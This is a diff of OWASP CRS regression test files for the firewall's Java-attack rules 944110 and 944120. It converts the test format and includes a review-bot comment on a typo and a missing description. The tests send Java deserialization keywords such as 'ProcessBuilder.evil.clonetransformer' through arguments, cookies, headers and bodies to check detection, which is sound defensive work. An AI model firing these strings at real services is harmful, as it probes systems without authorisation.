"OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - no_log_contains: "id \"944110\"" - - test_title: 944110-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log: + no_expect_ids: [944110] + - test_id: 17 desc: XML attribute value includes 
keywords java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log: + expect_ids: [944110] + - test_id: 18 desc: XML element value includes keywords java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.ProcessBuilder" - output: - log_contains: "id \"944110\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.ProcessBuilder" + output: + log: + expect_ids: [944110] 
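Review bot: The rewritten `meta` block at the top of this hunk drops the placeholder `description: "Description"` without replacing it, so 944110.yaml ends up with only an `author` key, whereas the neighbouring 944120.yaml hunk keeps `description: "Positive tests for rule 944120"`; for consistency across the suite I would add `description: "Tests for rule 944110 (java. Runtime / ProcessBuilder keywords)"` under `author`. While touching this file, the unchanged context line for test 16 carries a typo, `desc: XML attribute name includes keyworda java. and ProcessBuilder`, which should read `desc: XML attribute name includes keywords java. and ProcessBuilder`. As rendered on this page the XML-body tests (11–18) show `data: "value"` / `data: "element_value"` with no element markup; that is most likely the page rendering stripping angle-bracketed text rather than the committed file, but it is worth a glance at the file itself since tests 13, 14, 17 and 18 would not exercise the XML targets otherwise.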
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml index b1c48a52e..f4b8e75e1 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml 
@@ -1,2945 +1,2944 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944120.yaml" description: "Positive tests for rule 944120" +rule_id: 944120 tests: - - test_title: 944120-1 + - test_id: 1 desc: "Argument test includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.clonetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.clonetransformer" + output: + log: + expect_ids: [944120] + - test_id: 2 desc: "Argument name includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.clonetransformer=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + 
headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer=test" + output: + log: + expect_ids: [944120] + - test_id: 3 desc: "Cookie test includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.clonetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.clonetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 4 desc: "Cookie name includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.clonetransformer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.clonetransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 5 desc: "Request header test includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.clonetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.clonetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 6 desc: "XML element includes keyword 
ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944120] + - test_id: 7 desc: "XML attribute name includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + 
no_expect_ids: [944120] + - test_id: 8 desc: "XML attribute value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944120] + - test_id: 9 desc: "XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.clonetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer" + output: + log: + expect_ids: [944120] + - test_id: 10 desc: "Nested XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.clonetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer" + output: + log: + expect_ids: [944120] + - test_id: 11 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.clonetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.clonetransformer" + output: + log: + expect_ids: [944120] + - test_id: 12 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.clonetransformer\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.clonetransformer\"}" + output: + log: + expect_ids: [944120] + - test_id: 13 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: 
"HTTP/1.0" - data: "{\"ProcessBuilder.evil.clonetransformer\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.clonetransformer\": \"test\"}" + output: + log: + expect_ids: [944120] + - test_id: 14 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.clonetransformer": "test"} - 
-----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-15 + {"ProcessBuilder.evil.clonetransformer": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 15 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.clonetransformer": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-16 + {"ProcessBuilder.evil.clonetransformer": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 16 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - 
input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.clonetransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-17 + ProcessBuilder.evil.clonetransformer + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 17 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: 
"HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.clonetransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-18 + ProcessBuilder.evil.clonetransformer + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 18 desc: "Argument test includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.forclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" 
+ version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.forclosure" + output: + log: + expect_ids: [944120] + - test_id: 19 desc: "Argument name includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.forclosure=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure=test" + output: + log: + expect_ids: [944120] + - test_id: 20 desc: "Cookie test includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.forclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.forclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 21 desc: "Cookie name includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.forclosure=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.forclosure=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 22 desc: "Request header test includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: 
